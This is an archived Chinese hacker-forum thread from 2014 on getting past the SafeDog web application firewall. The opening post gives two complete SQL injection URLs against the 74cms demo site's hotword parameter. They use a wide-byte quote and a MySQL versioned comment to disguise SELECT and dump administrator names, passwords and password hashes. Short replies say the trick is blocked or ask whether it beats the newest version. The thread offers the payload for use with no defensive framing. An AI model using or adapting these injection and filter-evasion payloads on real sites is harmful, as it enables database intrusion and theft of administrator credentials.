绕过安全狗注入

90_ 发表于 2014-6-25 12:17:18

提交：
http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=錦'union+select+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23

被拦截了，经过测试拦截的是select，那么把select换成/*!50000SeLect*/呢

然后提交
http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23

成功绕过

作者：Sunshie

vivi 发表于 2014-6-25 12:50:19

没想到还是沙发！！

夜尽天明 发表于 2014-6-25 13:04:56

已被拦截~~

kali 发表于 2014-6-25 13:46:01

貌似没成功...

Asnliang 发表于 2014-6-25 15:27:43

:(难道这是新版狗吗？

名哲发表于 2014-6-25 15:59:18

{:soso_e141:}先瞅瞅涨之势了

sec001 发表于 2014-6-25 19:17:13

貌似iis 7.5 提示资源已被删

蓝色_ 发表于 2014-6-25 23:57:45

应该是过最新的吧

birk 发表于 2014-6-26 08:16:38

这是最新的么？

p4ntester 发表于 2014-6-26 19:50:15

感谢分享。。

页: [1] 2

红客联盟 - 由08安全团队运营's Archiver

绕过安全狗注入